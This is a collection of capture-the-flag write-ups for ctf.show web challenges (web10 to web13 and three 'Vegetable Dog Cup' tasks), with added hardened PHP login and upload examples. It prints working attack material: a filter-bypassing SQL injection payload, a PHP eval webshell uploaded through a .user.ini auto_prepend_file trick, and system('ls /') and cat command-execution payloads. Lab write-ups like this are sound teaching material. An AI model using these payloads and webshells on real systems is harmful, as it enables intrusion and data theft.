ctf.show_web10
The page shows a login box.
Clicking the cancel button reveals the source code:
<?php
$flag="";
function replaceSpecialChar($strParam){
    // Strip SQL keywords, whitespace, "union" and commas (case-insensitive) from the input
    $regex = "/(select|from|where|join|sleep|and|\s|union|,)/i";
    return preg_replace($regex,"",$strParam);
}
// The connection and parameter setup are not shown on the page; assumed here so the snippet runs
$con = mysqli_connect("localhost", "DB_USER", "DB_PASS", "DB_NAME"); // placeholder credentials
$username = $_GET['username'] ?? '';
$password = $_GET['password'] ?? '';
if (!$con)
{
    die('Could not connect: ' . mysqli_connect_error());
}
// If the filter removed anything, the input contained a blocked token
if(strlen($username)!=strlen(replaceSpecialChar($username))){
    die("sql inject error");
}
if(strlen($password)!=strlen(replaceSpecialChar($password))){
    die("sql inject error");
}
$sql="select * from user where username = '$username'"; // user input concatenated into the SQL text
$result=mysqli_query($con,$sql);
if(mysqli_num_rows($result)>0){
    while($row=mysqli_fetch_assoc($result)){
        if($password==$row['password']){ // loose comparison: "" == NULL is true
            echo "登陆成功<br>"; // "login successful"
            echo $flag;
        }
    }
}
?>
Many injection keywords are filtered.
The trick here is to combine group by with with rollup.
group by groups the rows by a column; the groups are sorted in ascending order by default.
with rollup (which can follow a group by) adds summary rows on top of the per-group statistics.
The result gains an extra row in which the password column is NULL and count(*) holds the overall total.
For example:
select password,count(*) from test group by password with rollup;
So we construct the payload:
username=admin'/**/or/**/1=1/**/group/**/by/**/password/**/with/**/rollup#&password=
Because with rollup adds a row whose password is NULL, we only need to enter an empty password so that the loose comparison against that row succeeds (NULL==NULL); /**/ is used in place of spaces to bypass the whitespace filter.
You can get the flag:
ctfshow{d89ccf86-5ac9-4429-95e0-ea40b0afba89}
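As an added example that is not part of the original writeup or of the challenge, here is a hardened version of the web10 login that removes both weaknesses the payload relies on: the string-concatenated SQL and the loose comparison against a NULL password. The table layout, the column name password_hash and the database credentials are assumptions.

```php
<?php
// Added example, not the challenge's code. Assumes a MySQL table `user` with
// columns username and password_hash (created with password_hash()); the
// connection credentials below are placeholders.
declare(strict_types=1);
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // throw instead of returning false

function login(mysqli $con, string $username, string $password): bool
{
    // Parameterised query: the username is bound as data, never spliced into the
    // SQL text, so no keyword/whitespace blocklist is needed and /**/ is just data.
    $stmt = $con->prepare('SELECT password_hash FROM user WHERE username = ? LIMIT 1');
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc(); // requires mysqlnd
    $stmt->close();

    // No row, a NULL hash, or an empty password is a failure: there is no
    // loose "" == NULL comparison for a rollup-style NULL row to satisfy.
    if ($row === null || !is_string($row['password_hash']) || $password === '') {
        return false;
    }
    // Strict, constant-time check against a stored hash instead of == on plaintext.
    return password_verify($password, $row['password_hash']);
}

$con = new mysqli('localhost', 'DB_USER', 'DB_PASS', 'DB_NAME'); // placeholders
$username = (string)($_POST['username'] ?? '');
$password = (string)($_POST['password'] ?? '');

if (login($con, $username, $password)) {
    echo 'login successful';
} else {
    echo 'login failed';
}
```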
2. ctf.show_web11
On the home page
you can see that the php code has many restrictions.
Notice how the flag is obtained: $password==$_SESSION['password'].
The password is entered by ourselves, and the session is identified by a cookie held locally, so we only need to enter an empty password and delete the local session cookie: the fresh session has no password set, and the loose comparison against it succeeds.
Get the flag:
ctfshow{5f4e07ee-e7d9-4302-8b7d-f3eabfa0ed16}
3. ctf.show_web12
On the home page,
check the source code first.
There is a hint about a cmd variable, which suggests that the backend probably has a code-execution function.
Enter phpinfo(); to view the php configuration information.
It turns out that many command-execution functions are disabled.
You can also use highlight_file("index.php"); to view the source code.
Another useful php function here is glob():
the glob() function returns the file names or directories that match the specified pattern.
For example:
glob("*") matches any file
glob("*.txt") matches files with the .txt suffix
With this function, we first list all the files in the current directory to see what is available. Entering ?cmd=print_r(glob("*")); prints out the following file,
and then we read the file:
?cmd=highlight_file('903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php');
Get the flag:
ctfshow{2eb6ffd3-82c8-4718-a528-9b251e5a31e9}
4. ctf.show_web13
On the page,
try to upload a file; nothing happens, so look for hidden files and directories.
upload.php is found; requesting upload.php.bak yields the source code file:
<?php
header("content-type:text/html;charset=utf-8");
$filename = $_FILES['file']['name'];
$temp_name = $_FILES['file']['tmp_name'];
$size = $_FILES['file']['size'];
$error = $_FILES['file']['error'];
$arr = pathinfo($filename);
$ext_suffix = $arr['extension'];
if ($size > 24){ // file must be at most 24 bytes
    die("error file zise");
}
if (strlen($filename)>9){ // file name at most 9 characters
    die("error file name");
}
if(strlen($ext_suffix)>3){ // suffix at most 3 characters
    die("error suffix");
}
if(preg_match("/php/i",$ext_suffix)){ // "php" blocked in the suffix
    die("error suffix");
}
if(preg_match("/php/i",$filename)){ // "php" blocked anywhere in the name
    die("error file name");
}
if (move_uploaded_file($temp_name, './'.$filename)){ // stored under the client-supplied name
    echo "文件上传成功!"; // "file upload succeeded"
}else{
    echo "文件上传失败!"; // "file upload failed"
}
?>
From the source code we see the restrictions: the file size must be <=24 bytes, the name length <=9, the suffix length <=3, and neither the name nor the suffix may contain php. A webshell that fits these limits can be
constructed:
<?php eval($_POST['a']);
Because of the suffix restriction, upload it as 2.txt first,
and then upload the .user.ini file.
PHP explains .user.ini as follows:
PHP searches each directory for a file with this name; if the setting is an empty string, PHP does not search. So if auto_prepend_file is set in .user.ini, every php page in that directory will include the contents of the named file.
We put auto_prepend_file = 2.txt in .user.ini, so that every php file in this directory includes the content of 2.txt.
After connecting with AntSword, we find there is no permission to operate on files, so we look up the flag directly on the web page.
Submit with POST:
a=print_r(glob("*"));
Then use highlight_file() to get the flag:
a=highlight_file("文件名");
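As an added example that is not part of the original writeup or of the challenge, here is a hardened replacement for upload.php that closes the .user.ini route: an extension allowlist checked against the sniffed content type, rejection of dotfiles, a server-chosen file name, and storage outside the web root. UPLOAD_DIR and the ALLOWED map are assumptions.

```php
<?php
// Added example, not the challenge's code. UPLOAD_DIR and the ALLOWED map are
// assumptions; the directory must not be served (or must have PHP execution off).
declare(strict_types=1);

const UPLOAD_DIR = '/var/app/uploads';   // placeholder path outside the web root
const MAX_SIZE   = 1024 * 1024;
// Allowlist: extension => MIME type the file content must really have.
const ALLOWED = ['png' => 'image/png', 'jpg' => 'image/jpeg', 'txt' => 'text/plain'];

// Returns the accepted extension, or null if the upload must be rejected.
function validateUpload(array $file): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK || $file['size'] > MAX_SIZE) {
        return null;
    }
    $name = basename((string)$file['name']);
    // Dotfiles such as .user.ini or .htaccess change PHP/server behaviour: reject them.
    if ($name === '' || $name[0] === '.') {
        return null;
    }
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    // Allowlist rather than a "php" blocklist, so phtml/phar/ini never need enumerating.
    if (!array_key_exists($ext, ALLOWED)) {
        return null;
    }
    // Sniff the real content type; a .txt holding "<?php ..." is typically
    // detected as text/x-php rather than text/plain and is therefore rejected.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    return $mime === ALLOWED[$ext] ? $ext : null;
}

$ext = isset($_FILES['file']) ? validateUpload($_FILES['file']) : null;
if ($ext === null) {
    http_response_code(400);
    exit('upload rejected');
}
// Server-chosen random name: the client never controls the stored path or suffix.
$dest = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
if (!move_uploaded_file($_FILES['file']['tmp_name'], $dest)) {
    http_response_code(500);
    exit('upload failed');
}
echo 'upload stored';
```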
5. Vegetable Dog Cup
1. Web sign-in
On the page,
the code is:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2022-11-10 17:20:38
# @Last Modified by: h1xa
# @Last Modified time: 2022-11-11 09:38:59
# @email: [email protected]
# @link: https://ctfer.com
*/
error_reporting(0);
highlight_file(__FILE__);
eval($_REQUEST[$_GET[$_POST[$_COOKIE['CTFshow-QQ群:']]]][6][0][7][5][8][0][9][4][4]);
I tried for a long time; is this really a sign-in challenge? After reading an experienced player's writeup, the summary is:
the challenge tests the relationship between request methods and assignment, as well as the encoding of Chinese characters in the Cookie field.
The key is the final one-line webshell, which is heavily nested. Let's take it apart:
first, the innermost part is 'CTFshow-QQ群:' wrapped in $_COOKIE, that is, the value of the 'CTFshow-QQ群:' cookie is taken;
so if we send the cookie CTFshow-QQ群:=a,
the one-liner becomes:
eval($_REQUEST[$_GET[$_POST[a]]][6][0][7][5][8][0][9][4][4]);
Next, $_POST[a] is the value of the parameter a sent by POST; we send a=b,
and it becomes:
eval($_REQUEST[$_GET[b]][6][0][7][5][8][0][9][4][4]);
$_GET[b] is the value of the parameter b sent by GET; we assign b=c
to get:
eval($_REQUEST[c][6][0][7][5][8][0][9][4][4]);
In $_REQUEST[c][6][0][7][5][8][0][9][4][4],
$_REQUEST
accepts parameters sent by any method, c is an array, and [6][0][7][5][8][0][9][4][4] is a chain of nested keys in the c array;
PHP parses request parameters with explicit keys into nested arrays, so these keys can be set directly from the request.
So we can assign a value directly to those keys of the c array:
c[6][0][7][5][8][0][9][4][4]= system('ls /');
We send the request as a POST, taking care to url-encode "群"
as %E7%BE%A4,
otherwise burp will not recognise it (the assignment to c can be placed in the query string or in the request body, because $_REQUEST accepts both GET and POST).
Here I use HackBar for convenience,
and we get the flagaaa file; enter the command cat /f1agaaa
to get the flag,
and learn a lot along the way.
2.web2 c0me_t0_s1gn
On the page
a prompt said there was information to be found. I tried Yujian and dirsearch to enumerate directories but could not find anything. Later I looked at the page source and saw
some information about the flag; following the hint there led to the browser console, which printed
the method for finding the flag.
After running it, the second half of the flag was obtained and spliced onto the first.
3. I only have $ in my eyes
On the page:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2022-11-10 17:20:38
# @Last Modified by: h1xa
# @Last Modified time: 2022-11-11 08:21:54
# @email: [email protected]
# @link: https://ctfer.com
*/
error_reporting(0);
extract($_POST);
eval($$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$_);
highlight_file(__FILE__);
The parameters are passed in via POST, and extract($_POST) turns each POST parameter into a variable. The challenge tests variable variables: a long chain of $
applied to the starting variable _,
so we need to define the variables one after another, each pointing to the next, with the last one holding the command to execute, system('ls /');
the variable names must not repeat.
Not being good at writing scripts, I refer to an experienced player's payload:
_=a&a=b&b=c&c=d&d=e&e=f&f=g&g=h&h=i&i=j&j=k&k=l&l=m&m=n&n=o&o=p&p=q&q=r&r=s&s=t&t=u&u=v&v=w&w=x&x=y&y=z&z=A&A=B&B=C&C=D&D=E&E=F&F=G&G=H&H=I&I=system('ls /')
Modify the command to get the flag.
Summary
Follow-up notes on ctfshow will continue to be shared.